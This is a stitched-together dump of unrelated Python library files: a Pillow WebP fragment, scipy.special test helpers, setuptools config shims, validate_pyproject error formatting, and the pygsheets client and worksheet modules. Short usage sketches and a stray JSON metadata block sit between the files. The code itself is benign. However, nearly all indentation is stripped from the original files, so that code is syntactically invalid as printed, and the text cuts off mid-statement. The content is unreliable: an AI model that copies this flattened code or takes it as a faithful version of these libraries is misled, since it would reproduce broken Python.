Image.register_mime(WebPImageFile.format, "image/webp")
```
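A hedged round-trip sketch using the encoder options read by _save above (lossless, quality, method); the file name is illustrative:
```python
from PIL import Image

im = Image.new("RGB", (64, 64), "red")
im.save("example.webp", lossless=True, quality=100, method=6)
with Image.open("example.webp") as reopened:
    print(reopened.format, reopened.size)  # e.g. WEBP (64, 64)
```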
#### File: scipy/special/_testutils.py
```python
import os
import functools
import operator
from scipy._lib import _pep440
import numpy as np
from numpy.testing import assert_
import pytest
import scipy.special as sc
__all__ = ['with_special_errors', 'assert_func_equal', 'FuncData']
#------------------------------------------------------------------------------
# Check if a module is present to be used in tests
#------------------------------------------------------------------------------
class MissingModule:
def __init__(self, name):
self.name = name
def check_version(module, min_ver):
if type(module) == MissingModule:
return pytest.mark.skip(reason="{} is not installed".format(module.name))
return pytest.mark.skipif(_pep440.parse(module.__version__) < _pep440.Version(min_ver),
reason="{} version >= {} required".format(module.__name__, min_ver))
#------------------------------------------------------------------------------
# Enable convergence and loss of precision warnings -- turn off one by one
#------------------------------------------------------------------------------
def with_special_errors(func):
"""
Enable special function errors (such as underflow, overflow,
loss of precision, etc.)
"""
@functools.wraps(func)
def wrapper(*a, **kw):
with sc.errstate(all='raise'):
res = func(*a, **kw)
return res
return wrapper
#------------------------------------------------------------------------------
# Comparing function values at many data points at once, with helpful
# error reports
#------------------------------------------------------------------------------
def assert_func_equal(func, results, points, rtol=None, atol=None,
param_filter=None, knownfailure=None,
vectorized=True, dtype=None, nan_ok=False,
ignore_inf_sign=False, distinguish_nan_and_inf=True):
if hasattr(points, 'next'):
# it's a generator
points = list(points)
points = np.asarray(points)
if points.ndim == 1:
points = points[:,None]
nparams = points.shape[1]
if hasattr(results, '__name__'):
# function
data = points
result_columns = None
result_func = results
else:
# dataset
data = np.c_[points, results]
result_columns = list(range(nparams, data.shape[1]))
result_func = None
fdata = FuncData(func, data, list(range(nparams)),
result_columns=result_columns, result_func=result_func,
rtol=rtol, atol=atol, param_filter=param_filter,
knownfailure=knownfailure, nan_ok=nan_ok, vectorized=vectorized,
ignore_inf_sign=ignore_inf_sign,
distinguish_nan_and_inf=distinguish_nan_and_inf)
fdata.check()
class FuncData:
"""
Data set for checking a special function.
Parameters
----------
func : function
Function to test
data : numpy array
columnar data to use for testing
param_columns : int or tuple of ints
Columns indices in which the parameters to `func` lie.
Can be imaginary integers to indicate that the parameter
should be cast to complex.
result_columns : int or tuple of ints, optional
Column indices for expected results from `func`.
result_func : callable, optional
Function to call to obtain results.
rtol : float, optional
Required relative tolerance. Default is 5*eps.
atol : float, optional
Required absolute tolerance. Default is 5*tiny.
param_filter : function, or tuple of functions/Nones, optional
Filter functions to exclude some parameter ranges.
If omitted, no filtering is done.
knownfailure : str, optional
Known failure error message to raise when the test is run.
If omitted, no exception is raised.
nan_ok : bool, optional
If nan is always an accepted result.
vectorized : bool, optional
Whether all functions passed in are vectorized.
ignore_inf_sign : bool, optional
Whether to ignore signs of infinities.
(Doesn't matter for complex-valued functions.)
distinguish_nan_and_inf : bool, optional
        If False, treat a nan in one result and an inf in the other as
        equal; also forces ignore_inf_sign to be True.
"""
def __init__(self, func, data, param_columns, result_columns=None,
result_func=None, rtol=None, atol=None, param_filter=None,
knownfailure=None, dataname=None, nan_ok=False, vectorized=True,
ignore_inf_sign=False, distinguish_nan_and_inf=True):
self.func = func
self.data = data
self.dataname = dataname
if not hasattr(param_columns, '__len__'):
param_columns = (param_columns,)
self.param_columns = tuple(param_columns)
if result_columns is not None:
if not hasattr(result_columns, '__len__'):
result_columns = (result_columns,)
self.result_columns = tuple(result_columns)
if result_func is not None:
raise ValueError("Only result_func or result_columns should be provided")
elif result_func is not None:
self.result_columns = None
else:
raise ValueError("Either result_func or result_columns should be provided")
self.result_func = result_func
self.rtol = rtol
self.atol = atol
if not hasattr(param_filter, '__len__'):
param_filter = (param_filter,)
self.param_filter = param_filter
self.knownfailure = knownfailure
self.nan_ok = nan_ok
self.vectorized = vectorized
self.ignore_inf_sign = ignore_inf_sign
self.distinguish_nan_and_inf = distinguish_nan_and_inf
if not self.distinguish_nan_and_inf:
self.ignore_inf_sign = True
def get_tolerances(self, dtype):
if not np.issubdtype(dtype, np.inexact):
dtype = np.dtype(float)
info = np.finfo(dtype)
rtol, atol = self.rtol, self.atol
if rtol is None:
rtol = 5*info.eps
if atol is None:
atol = 5*info.tiny
return rtol, atol
def check(self, data=None, dtype=None, dtypes=None):
"""Check the special function against the data."""
__tracebackhide__ = operator.methodcaller(
'errisinstance', AssertionError
)
if self.knownfailure:
pytest.xfail(reason=self.knownfailure)
if data is None:
data = self.data
if dtype is None:
dtype = data.dtype
else:
data = data.astype(dtype)
rtol, atol = self.get_tolerances(dtype)
# Apply given filter functions
if self.param_filter:
param_mask = np.ones((data.shape[0],), np.bool_)
for j, filter in zip(self.param_columns, self.param_filter):
if filter:
param_mask &= list(filter(data[:,j]))
data = data[param_mask]
# Pick parameters from the correct columns
params = []
for idx, j in enumerate(self.param_columns):
if np.iscomplexobj(j):
j = int(j.imag)
params.append(data[:,j].astype(complex))
elif dtypes and idx < len(dtypes):
params.append(data[:, j].astype(dtypes[idx]))
else:
params.append(data[:,j])
# Helper for evaluating results
def eval_func_at_params(func, skip_mask=None):
if self.vectorized:
got = func(*params)
else:
got = []
for j in range(len(params[0])):
if skip_mask is not None and skip_mask[j]:
got.append(np.nan)
continue
got.append(func(*tuple([params[i][j] for i in range(len(params))])))
got = np.asarray(got)
if not isinstance(got, tuple):
got = (got,)
return got
# Evaluate function to be tested
got = eval_func_at_params(self.func)
# Grab the correct results
if self.result_columns is not None:
# Correct results passed in with the data
wanted = tuple([data[:,icol] for icol in self.result_columns])
else:
# Function producing correct results passed in
skip_mask = None
if self.nan_ok and len(got) == 1:
# Don't spend time evaluating what doesn't need to be evaluated
skip_mask = np.isnan(got[0])
wanted = eval_func_at_params(self.result_func, skip_mask=skip_mask)
# Check the validity of each output returned
assert_(len(got) == len(wanted))
for output_num, (x, y) in enumerate(zip(got, wanted)):
if np.issubdtype(x.dtype, np.complexfloating) or self.ignore_inf_sign:
pinf_x = np.isinf(x)
pinf_y = np.isinf(y)
minf_x = np.isinf(x)
minf_y = np.isinf(y)
else:
pinf_x = np.isposinf(x)
pinf_y = np.isposinf(y)
minf_x = np.isneginf(x)
minf_y = np.isneginf(y)
nan_x = np.isnan(x)
nan_y = np.isnan(y)
with np.errstate(all='ignore'):
abs_y = np.absolute(y)
abs_y[~np.isfinite(abs_y)] = 0
diff = np.absolute(x - y)
diff[~np.isfinite(diff)] = 0
rdiff = diff / np.absolute(y)
rdiff[~np.isfinite(rdiff)] = 0
tol_mask = (diff <= atol + rtol*abs_y)
pinf_mask = (pinf_x == pinf_y)
minf_mask = (minf_x == minf_y)
nan_mask = (nan_x == nan_y)
bad_j = ~(tol_mask & pinf_mask & minf_mask & nan_mask)
point_count = bad_j.size
if self.nan_ok:
bad_j &= ~nan_x
bad_j &= ~nan_y
point_count -= (nan_x | nan_y).sum()
if not self.distinguish_nan_and_inf and not self.nan_ok:
# If nan's are okay we've already covered all these cases
inf_x = np.isinf(x)
inf_y = np.isinf(y)
both_nonfinite = (inf_x & nan_y) | (nan_x & inf_y)
bad_j &= ~both_nonfinite
point_count -= both_nonfinite.sum()
if np.any(bad_j):
# Some bad results: inform what, where, and how bad
msg = [""]
msg.append("Max |adiff|: %g" % diff[bad_j].max())
msg.append("Max |rdiff|: %g" % rdiff[bad_j].max())
msg.append("Bad results (%d out of %d) for the following points (in output %d):"
% (np.sum(bad_j), point_count, output_num,))
for j in np.nonzero(bad_j)[0]:
j = int(j)
fmt = lambda x: "%30s" % np.array2string(x[j], precision=18)
a = " ".join(map(fmt, params))
b = " ".join(map(fmt, got))
c = " ".join(map(fmt, wanted))
d = fmt(rdiff)
msg.append("%s => %s != %s (rdiff %s)" % (a, b, c, d))
assert_(False, "\n".join(msg))
def __repr__(self):
"""Pretty-printing, esp. for Nose output"""
if np.any(list(map(np.iscomplexobj, self.param_columns))):
is_complex = " (complex)"
else:
is_complex = ""
if self.dataname:
return "<Data for %s%s: %s>" % (self.func.__name__, is_complex,
os.path.basename(self.dataname))
else:
return "<Data for %s%s>" % (self.func.__name__, is_complex)
```
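The comparison logic in `check` above accepts a value when `|got - wanted| <= atol + rtol*|wanted|` and the NaN / ±inf masks agree, with default tolerances of `5*eps` and `5*tiny` for the dtype. A minimal standalone sketch of that acceptance rule in plain NumPy follows; the function name and the small driver at the bottom are illustrative and not part of the test suite above.
```python
import numpy as np

def within_tol(got, wanted, rtol=None, atol=None):
    """Element-wise acceptance test mirroring the tolerance rule in check() above."""
    got = np.asarray(got, dtype=float)
    wanted = np.asarray(wanted, dtype=float)
    info = np.finfo(wanted.dtype)
    rtol = 5 * info.eps if rtol is None else rtol   # same defaults as get_tolerances()
    atol = 5 * info.tiny if atol is None else atol
    with np.errstate(all='ignore'):
        abs_w = np.absolute(wanted)
        abs_w[~np.isfinite(abs_w)] = 0
        diff = np.absolute(got - wanted)
        diff[~np.isfinite(diff)] = 0
    ok = diff <= atol + rtol * abs_w
    ok &= np.isnan(got) == np.isnan(wanted)          # NaNs must appear in the same places
    ok &= np.isposinf(got) == np.isposinf(wanted)    # +inf must match
    ok &= np.isneginf(got) == np.isneginf(wanted)    # -inf must match
    return ok

print(within_tol([1.0, np.nan, np.inf], [1.0 + 1e-16, np.nan, np.inf]))  # [ True  True  True]
```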
#### File: setuptools/config/__init__.py
```python
import warnings
from functools import wraps
from textwrap import dedent
from typing import Callable, TypeVar, cast
from .._deprecation_warning import SetuptoolsDeprecationWarning
from . import setupcfg
Fn = TypeVar("Fn", bound=Callable)
__all__ = ('parse_configuration', 'read_configuration')
def _deprecation_notice(fn: Fn) -> Fn:
@wraps(fn)
def _wrapper(*args, **kwargs):
msg = f"""\
As setuptools moves its configuration towards `pyproject.toml`,
`{__name__}.{fn.__name__}` became deprecated.
For the time being, you can use the `{setupcfg.__name__}` module
to access a backward compatible API, but this module is provisional
and might be removed in the future.
"""
warnings.warn(dedent(msg), SetuptoolsDeprecationWarning)
return fn(*args, **kwargs)
return cast(Fn, _wrapper)
read_configuration = _deprecation_notice(setupcfg.read_configuration)
parse_configuration = _deprecation_notice(setupcfg.parse_configuration)
```
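The module above is essentially a deprecation shim: each re-exported function is wrapped so that calling it emits a `SetuptoolsDeprecationWarning` before delegating to `setupcfg`. Below is a self-contained sketch of the same wrap-and-warn pattern, using a generic `DeprecationWarning` and a made-up `read_settings` function purely for illustration.
```python
import warnings
from functools import wraps
from textwrap import dedent

def deprecated(replacement_hint):
    """Wrap a callable so that every call emits a DeprecationWarning before delegating."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(*args, **kwargs):
            msg = f"""\
            `{fn.__name__}` is deprecated.
            {replacement_hint}
            """
            warnings.warn(dedent(msg), DeprecationWarning, stacklevel=2)
            return fn(*args, **kwargs)
        return wrapper
    return decorator

@deprecated("Use the (hypothetical) new_config module instead.")
def read_settings(path):
    return {"path": path}

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    print(read_settings("setup.cfg"))    # {'path': 'setup.cfg'}
    print(caught[0].category.__name__)   # DeprecationWarning
```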
#### File: config/_validate_pyproject/error_reporting.py
```python
import io
import json
import logging
import os
import re
from contextlib import contextmanager
from textwrap import indent, wrap
from typing import Any, Dict, Iterator, List, Optional, Sequence, Union, cast
from .fastjsonschema_exceptions import JsonSchemaValueException
_logger = logging.getLogger(__name__)
_MESSAGE_REPLACEMENTS = {
"must be named by propertyName definition": "keys must be named by",
"one of contains definition": "at least one item that matches",
" same as const definition:": "",
"only specified items": "only items matching the definition",
}
_SKIP_DETAILS = (
"must not be empty",
"is always invalid",
"must not be there",
)
_NEED_DETAILS = {"anyOf", "oneOf", "anyOf", "contains", "propertyNames", "not", "items"}
_CAMEL_CASE_SPLITTER = re.compile(r"\W+|([A-Z][^A-Z\W]*)")
_IDENTIFIER = re.compile(r"^[\w_]+$", re.I)
_TOML_JARGON = {
"object": "table",
"property": "key",
"properties": "keys",
"property names": "keys",
}
class ValidationError(JsonSchemaValueException):
"""Report violations of a given JSON schema.
This class extends :exc:`~fastjsonschema.JsonSchemaValueException`
by adding the following properties:
- ``summary``: an improved version of the ``JsonSchemaValueException`` error message
(with only the necessary information)
- ``details``: more contextual information about the error like the failing schema
itself and the value that violates the schema.
Depending on the level of the verbosity of the ``logging`` configuration
the exception message will be only ``summary`` (default) or a combination of
``summary`` and ``details`` (when the logging level is set to :obj:`logging.DEBUG`).
"""
summary = ""
details = ""
_original_message = ""
@classmethod
def _from_jsonschema(cls, ex: JsonSchemaValueException):
formatter = _ErrorFormatting(ex)
obj = cls(str(formatter), ex.value, formatter.name, ex.definition, ex.rule)
debug_code = os.getenv("JSONSCHEMA_DEBUG_CODE_GENERATION", "false").lower()
if debug_code != "false": # pragma: no cover
obj.__cause__, obj.__traceback__ = ex.__cause__, ex.__traceback__
obj._original_message = ex.message
obj.summary = formatter.summary
obj.details = formatter.details
return obj
@contextmanager
def detailed_errors():
try:
yield
except JsonSchemaValueException as ex:
raise ValidationError._from_jsonschema(ex) from None
class _ErrorFormatting:
def __init__(self, ex: JsonSchemaValueException):
self.ex = ex
self.name = f"`{self._simplify_name(ex.name)}`"
self._original_message = self.ex.message.replace(ex.name, self.name)
self._summary = ""
self._details = ""
def __str__(self) -> str:
if _logger.getEffectiveLevel() <= logging.DEBUG and self.details:
return f"{self.summary}\n\n{self.details}"
return self.summary
@property
def summary(self) -> str:
if not self._summary:
self._summary = self._expand_summary()
return self._summary
@property
def details(self) -> str:
if not self._details:
self._details = self._expand_details()
return self._details
def _simplify_name(self, name):
x = len("data.")
return name[x:] if name.startswith("data.") else name
def _expand_summary(self):
msg = self._original_message
for bad, repl in _MESSAGE_REPLACEMENTS.items():
msg = msg.replace(bad, repl)
if any(substring in msg for substring in _SKIP_DETAILS):
return msg
schema = self.ex.rule_definition
if self.ex.rule in _NEED_DETAILS and schema:
summary = _SummaryWriter(_TOML_JARGON)
return f"{msg}:\n\n{indent(summary(schema), ' ')}"
return msg
def _expand_details(self) -> str:
optional = []
desc_lines = self.ex.definition.pop("$$description", [])
desc = self.ex.definition.pop("description", None) or " ".join(desc_lines)
if desc:
description = "\n".join(
wrap(
desc,
width=80,
initial_indent=" ",
subsequent_indent=" ",
break_long_words=False,
)
)
optional.append(f"DESCRIPTION:\n{description}")
schema = json.dumps(self.ex.definition, indent=4)
value = json.dumps(self.ex.value, indent=4)
defaults = [
f"GIVEN VALUE:\n{indent(value, ' ')}",
f"OFFENDING RULE: {self.ex.rule!r}",
f"DEFINITION:\n{indent(schema, ' ')}",
]
return "\n\n".join(optional + defaults)
class _SummaryWriter:
_IGNORE = {"description", "default", "title", "examples"}
def __init__(self, jargon: Optional[Dict[str, str]] = None):
self.jargon: Dict[str, str] = jargon or {}
# Clarify confusing terms
self._terms = {
"anyOf": "at least one of the following",
"oneOf": "exactly one of the following",
"allOf": "all of the following",
"not": "(*NOT* the following)",
"prefixItems": f"{self._jargon('items')} (in order)",
"items": "items",
"contains": "contains at least one of",
"propertyNames": (
f"non-predefined acceptable {self._jargon('property names')}"
),
"patternProperties": f"{self._jargon('properties')} named via pattern",
"const": "predefined value",
"enum": "one of",
}
# Attributes that indicate that the definition is easy and can be done
# inline (e.g. string and number)
self._guess_inline_defs = [
"enum",
"const",
"maxLength",
"minLength",
"pattern",
"format",
"minimum",
"maximum",
"exclusiveMinimum",
"exclusiveMaximum",
"multipleOf",
]
def _jargon(self, term: Union[str, List[str]]) -> Union[str, List[str]]:
if isinstance(term, list):
return [self.jargon.get(t, t) for t in term]
return self.jargon.get(term, term)
def __call__(
self,
schema: Union[dict, List[dict]],
prefix: str = "",
*,
_path: Sequence[str] = (),
) -> str:
if isinstance(schema, list):
return self._handle_list(schema, prefix, _path)
filtered = self._filter_unecessary(schema, _path)
simple = self._handle_simple_dict(filtered, _path)
if simple:
return f"{prefix}{simple}"
child_prefix = self._child_prefix(prefix, " ")
item_prefix = self._child_prefix(prefix, "- ")
indent = len(prefix) * " "
with io.StringIO() as buffer:
for i, (key, value) in enumerate(filtered.items()):
child_path = [*_path, key]
line_prefix = prefix if i == 0 else indent
buffer.write(f"{line_prefix}{self._label(child_path)}:")
# ^ just the first item should receive the complete prefix
if isinstance(value, dict):
filtered = self._filter_unecessary(value, child_path)
simple = self._handle_simple_dict(filtered, child_path)
buffer.write(
f" {simple}"
if simple
else f"\n{self(value, child_prefix, _path=child_path)}"
)
elif isinstance(value, list) and (
key != "type" or self._is_property(child_path)
):
children = self._handle_list(value, item_prefix, child_path)
sep = " " if children.startswith("[") else "\n"
buffer.write(f"{sep}{children}")
else:
buffer.write(f" {self._value(value, child_path)}\n")
return buffer.getvalue()
def _is_unecessary(self, path: Sequence[str]) -> bool:
if self._is_property(path) or not path: # empty path => instruction @ root
return False
key = path[-1]
return any(key.startswith(k) for k in "$_") or key in self._IGNORE
def _filter_unecessary(self, schema: dict, path: Sequence[str]):
return {
key: value
for key, value in schema.items()
if not self._is_unecessary([*path, key])
}
def _handle_simple_dict(self, value: dict, path: Sequence[str]) -> Optional[str]:
inline = any(p in value for p in self._guess_inline_defs)
simple = not any(isinstance(v, (list, dict)) for v in value.values())
if inline or simple:
return f"{{{', '.join(self._inline_attrs(value, path))}}}\n"
return None
def _handle_list(
self, schemas: list, prefix: str = "", path: Sequence[str] = ()
) -> str:
if self._is_unecessary(path):
return ""
repr_ = repr(schemas)
if all(not isinstance(e, (dict, list)) for e in schemas) and len(repr_) < 60:
return f"{repr_}\n"
item_prefix = self._child_prefix(prefix, "- ")
return "".join(
self(v, item_prefix, _path=[*path, f"[{i}]"]) for i, v in enumerate(schemas)
)
def _is_property(self, path: Sequence[str]):
"""Check if the given path can correspond to an arbitrarily named property"""
counter = 0
for key in path[-2::-1]:
if key not in {"properties", "patternProperties"}:
break
counter += 1
# If the counter is even, the path corresponds to a JSON Schema keyword
# otherwise it can be any arbitrary string naming a property
return counter % 2 == 1
def _label(self, path: Sequence[str]) -> str:
*parents, key = path
if not self._is_property(path):
norm_key = _separate_terms(key)
return self._terms.get(key) or " ".join(self._jargon(norm_key))
if parents[-1] == "patternProperties":
return f"(regex {key!r})"
return repr(key) # property name
def _value(self, value: Any, path: Sequence[str]) -> str:
if path[-1] == "type" and not self._is_property(path):
type_ = self._jargon(value)
return (
f"[{', '.join(type_)}]" if isinstance(value, list) else cast(str, type_)
)
return repr(value)
def _inline_attrs(self, schema: dict, path: Sequence[str]) -> Iterator[str]:
for key, value in schema.items():
child_path = [*path, key]
yield f"{self._label(child_path)}: {self._value(value, child_path)}"
def _child_prefix(self, parent_prefix: str, child_prefix: str) -> str:
return len(parent_prefix) * " " + child_prefix
def _separate_terms(word: str) -> List[str]:
"""
>>> _separate_terms("FooBar-foo")
['foo', 'bar', 'foo']
"""
return [w.lower() for w in _CAMEL_CASE_SPLITTER.split(word) if w]
``` |
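The `_separate_terms` helper and `_CAMEL_CASE_SPLITTER` regex above turn JSON Schema keywords such as `propertyNames` into readable words before `_SummaryWriter` applies the TOML jargon table. A small standalone sketch of that keyword-to-prose step is shown below; the regex is copied from the module and the jargon table is trimmed to three entries.
```python
import re
from typing import List

_CAMEL_CASE_SPLITTER = re.compile(r"\W+|([A-Z][^A-Z\W]*)")  # copied from above
_TOML_JARGON = {"object": "table", "property": "key", "properties": "keys"}

def separate_terms(word: str) -> List[str]:
    """Split camelCase / punctuated keywords into lowercase words."""
    return [w.lower() for w in _CAMEL_CASE_SPLITTER.split(word) if w]

def humanize(keyword: str) -> str:
    """Render a JSON Schema keyword in TOML-flavoured wording."""
    return " ".join(_TOML_JARGON.get(term, term) for term in separate_terms(keyword))

print(separate_terms("FooBar-foo"))   # ['foo', 'bar', 'foo']
print(humanize("propertyNames"))      # key names
print(humanize("patternProperties"))  # pattern keys
```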
{
"source": "13rilliant/Python-CMS",
"score": 2
} |
#### File: site-packages/pygsheets/client.py
```python
import re
import warnings
import os
import logging
from pygsheets.drive import DriveAPIWrapper
from pygsheets.sheet import SheetAPIWrapper
from pygsheets.spreadsheet import Spreadsheet
from pygsheets.exceptions import SpreadsheetNotFound, NoValidUrlKeyFound
from pygsheets.custom_types import ValueRenderOption, DateTimeRenderOption
from google_auth_httplib2 import AuthorizedHttp
GOOGLE_SHEET_CELL_UPDATES_LIMIT = 50000
_url_key_re_v1 = re.compile(r'key=([^&#]+)')
_url_key_re_v2 = re.compile(r"/spreadsheets/d/([a-zA-Z0-9-_]+)")
_email_patttern = re.compile(r"\"?([-a-zA-Z0-9.`?{}]+@[-a-zA-Z0-9.]+\.\w+)\"?")
# _domain_pattern = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
_deprecated_keyword_mapping = {
'parent_id': 'folder',
}
class Client(object):
"""Create or access Google spreadsheets.
Exposes members to create new spreadsheets or open existing ones. Use `authorize` to create an instance of this
class.
>>> import pygsheets
>>> c = pygsheets.authorize()
The sheet API service object is stored in the sheet property and the drive API service object in the drive property.
>>> c.sheet.get('<SPREADSHEET ID>')
>>> c.drive.delete('<FILE ID>')
:param credentials: The credentials object returned by google-auth or google-auth-oauthlib.
:param retries: (Optional) Number of times to retry a connection before raising a TimeOut error.
Default: 3
:param http: The underlying HTTP object to use to make requests. If not specified, a
:class:`httplib2.Http` instance will be constructed.
"""
spreadsheet_cls = Spreadsheet
def __init__(self, credentials, retries=3, http=None):
self.oauth = credentials
self.logger = logging.getLogger(__name__)
http = AuthorizedHttp(credentials, http=http)
data_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
self.sheet = SheetAPIWrapper(http, data_path, retries=retries)
self.drive = DriveAPIWrapper(http, data_path)
@property
def teamDriveId(self):
""" Enable team drive support
Deprecated: use client.drive.enable_team_drive(team_drive_id=?)
"""
return self.drive.team_drive_id
@teamDriveId.setter
def teamDriveId(self, value):
warnings.warn("Depricated please use drive.enable_team_drive")
self.drive.enable_team_drive(value)
def spreadsheet_ids(self, query=None):
"""Get a list of all spreadsheet ids present in the Google Drive or TeamDrive accessed."""
return [x['id'] for x in self.drive.spreadsheet_metadata(query)]
def spreadsheet_titles(self, query=None):
"""Get a list of all spreadsheet titles present in the Google Drive or TeamDrive accessed."""
return [x['name'] for x in self.drive.spreadsheet_metadata(query)]
def create(self, title, template=None, folder=None, **kwargs):
"""Create a new spreadsheet.
The title will always be set to the given value (even overwriting the templates title). The template
can either be a `spreadsheet resource <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#resource-spreadsheet>`_
or an instance of :class:`~pygsheets.Spreadsheet`. In both cases undefined values will be ignored.
:param title: Title of the new spreadsheet.
:param template: A template to create the new spreadsheet from.
:param folder: The Id of the folder this sheet will be stored in.
:param kwargs: Standard parameters (see reference for details).
:return: :class:`~pygsheets.Spreadsheet`
"""
result = self.sheet.create(title, template=template, **kwargs)
if folder:
self.drive.move_file(result['spreadsheetId'],
old_folder=self.drive.spreadsheet_metadata(query="name = '" + title + "'")[0]['parents'][0],
new_folder=folder)
return self.spreadsheet_cls(self, jsonsheet=result)
def open(self, title):
"""Open a spreadsheet by title.
In a case where there are several sheets with the same title, the first one found is returned.
>>> import pygsheets
>>> c = pygsheets.authorize()
>>> c.open('TestSheet')
:param title: A title of a spreadsheet.
:returns: :class:`~pygsheets.Spreadsheet`
:raises pygsheets.SpreadsheetNotFound: No spreadsheet with the given title was found.
"""
try:
spreadsheet = list(filter(lambda x: x['name'] == title, self.drive.spreadsheet_metadata()))[0]
return self.open_by_key(spreadsheet['id'])
except (KeyError, IndexError):
raise SpreadsheetNotFound('Could not find a spreadsheet with title %s.' % title)
def open_by_key(self, key):
"""Open a spreadsheet by key.
>>> import pygsheets
>>> c = pygsheets.authorize()
>>> c.open_by_key('<KEY>')
:param key: The key of a spreadsheet. (can be found in the sheet URL)
:returns: :class:`~pygsheets.Spreadsheet`
:raises pygsheets.SpreadsheetNotFound: The given spreadsheet ID was not found.
"""
response = self.sheet.get(key,
fields='properties,sheets/properties,spreadsheetId,namedRanges',
includeGridData=False)
return self.spreadsheet_cls(self, response)
def open_by_url(self, url):
"""Open a spreadsheet by URL.
>>> import pygsheets
>>> c = pygsheets.authorize()
>>> c.open_by_url('https://docs.google.com/spreadsheet/ccc?key=0Bm...FE&hl')
:param url: URL of a spreadsheet as it appears in a browser.
:returns: :class:`~pygsheets.Spreadsheet`
:raises pygsheets.SpreadsheetNotFound: No spreadsheet was found with the given URL.
"""
m1 = _url_key_re_v1.search(url)
if m1:
return self.open_by_key(m1.group(1))
else:
m2 = _url_key_re_v2.search(url)
if m2:
return self.open_by_key(m2.group(1))
else:
raise NoValidUrlKeyFound
def open_all(self, query=''):
"""Opens all available spreadsheets.
Result can be filtered by specifying the query parameter. For details on how to form the query, see the
`Reference <https://developers.google.com/drive/v3/web/search-parameters>`_
:param query: (Optional) Can be used to filter the returned metadata.
:returns: A list of :class:`~pygsheets.Spreadsheet`.
"""
return [self.open_by_key(key) for key in self.spreadsheet_ids(query=query)]
def open_as_json(self, key):
"""Return a json representation of the spreadsheet.
See `Reference <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#Spreadsheet>`__ for details.
"""
return self.sheet.get(key, fields='properties,sheets/properties,sheets/protectedRanges,'
'spreadsheetId,namedRanges',
includeGridData=False)
def get_range(self, spreadsheet_id,
value_range,
major_dimension='ROWS',
value_render_option=ValueRenderOption.FORMATTED_VALUE,
date_time_render_option=DateTimeRenderOption.SERIAL_NUMBER):
"""Returns a range of values from a spreadsheet. The caller must specify the spreadsheet ID and a range.
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/get>`__
:param spreadsheet_id: The ID of the spreadsheet to retrieve data from.
:param value_range: The A1 notation of the values to retrieve.
:param major_dimension: The major dimension that results should use.
For example, if the spreadsheet data is: A1=1,B1=2,A2=3,B2=4, then
requesting range=A1:B2,majorDimension=ROWS will return [[1,2],[3,4]],
whereas requesting range=A1:B2,majorDimension=COLUMNS will return
[[1,3],[2,4]].
:param value_render_option: How values should be represented in the output. The default
render option is `ValueRenderOption.FORMATTED_VALUE`.
:param date_time_render_option: How dates, times, and durations should be represented in the output.
This is ignored if `valueRenderOption` is `FORMATTED_VALUE`. The default
dateTime render option is [`DateTimeRenderOption.SERIAL_NUMBER`].
:return: An array of arrays with the values fetched. Returns an empty array if no
values were fetched. Values are dynamically typed as int, float or string.
"""
result = self.sheet.values_get(spreadsheet_id, value_range, major_dimension, value_render_option,
date_time_render_option)
try:
return result['values']
except KeyError:
return [['']]
```
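Putting the pieces together, a typical session with this client looks roughly like the sketch below. The credentials file, spreadsheet title, and range are placeholders, and `pygsheets.authorize` is assumed to construct the `Client` defined above.
```python
import pygsheets

# Authorize with a service-account JSON file (the path is a placeholder).
gc = pygsheets.authorize(service_file='service_account.json')

# A spreadsheet can be opened by title, by key, or by URL; all return a Spreadsheet.
sh = gc.open('My Sheet')                    # first spreadsheet matching this title
# sh = gc.open_by_key('<SPREADSHEET KEY>')  # by the key from the sheet URL
# sh = gc.open_by_url('https://docs.google.com/spreadsheets/d/<KEY>/edit')

# Raw value fetch through the client itself, bypassing the Worksheet helpers.
values = gc.get_range(sh.id, 'Sheet1!A1:B2', major_dimension='ROWS')
print(values)
```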
#### File: site-packages/pygsheets/worksheet.py
```python
import datetime
import re
import warnings
import logging
from pygsheets.cell import Cell
from pygsheets.datarange import DataRange
from pygsheets.exceptions import (CellNotFound, InvalidArgumentValue, RangeNotFound)
from pygsheets.utils import numericise_all, format_addr, fullmatch
from pygsheets.custom_types import *
from pygsheets.chart import Chart
try:
import pandas as pd
except ImportError:
pd = None
_warning_mesage = "this {} is deprecated. Use {} instead"
_deprecated_keyword_mapping = {
'include_empty': 'include_tailing_empty',
'include_all': 'include_tailing_empty_rows',
}
class Worksheet(object):
"""
A worksheet.
:param spreadsheet: Spreadsheet object to which this worksheet belongs
:param jsonSheet: Contains properties to initialize this worksheet.
Ref to api details for more info
"""
def __init__(self, spreadsheet, jsonSheet):
self.logger = logging.getLogger(__name__)
self.spreadsheet = spreadsheet
self.client = spreadsheet.client
self._linked = True
self.jsonSheet = jsonSheet
self.data_grid = None # for storing sheet data while unlinked
self.grid_update_time = None
def __repr__(self):
return '<%s %s index:%s>' % (self.__class__.__name__,
repr(self.title), self.index)
@property
def id(self):
"""The ID of this worksheet."""
return self.jsonSheet['properties']['sheetId']
@property
def index(self):
"""The index of this worksheet"""
return self.jsonSheet['properties']['index']
@index.setter
def index(self, index):
self.jsonSheet['properties']['index'] = index
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], 'index')
@property
def title(self):
"""The title of this worksheet."""
return self.jsonSheet['properties']['title']
@title.setter
def title(self, title):
self.jsonSheet['properties']['title'] = title
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], 'title')
@property
def hidden(self):
"""Mark the worksheet as hidden."""
return self.jsonSheet['properties'].get('hidden', False)
@hidden.setter
def hidden(self, hidden):
self.jsonSheet['properties']['hidden'] = hidden
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], 'hidden')
@property
def url(self):
"""The url of this worksheet."""
return self.spreadsheet.url+"/edit#gid="+str(self.id)
@property
def rows(self):
"""Number of rows active within the sheet. A new sheet contains 1000 rows."""
return int(self.jsonSheet['properties']['gridProperties']['rowCount'])
@rows.setter
def rows(self, row_count):
if row_count == self.rows:
return
self.jsonSheet['properties']['gridProperties']['rowCount'] = int(row_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
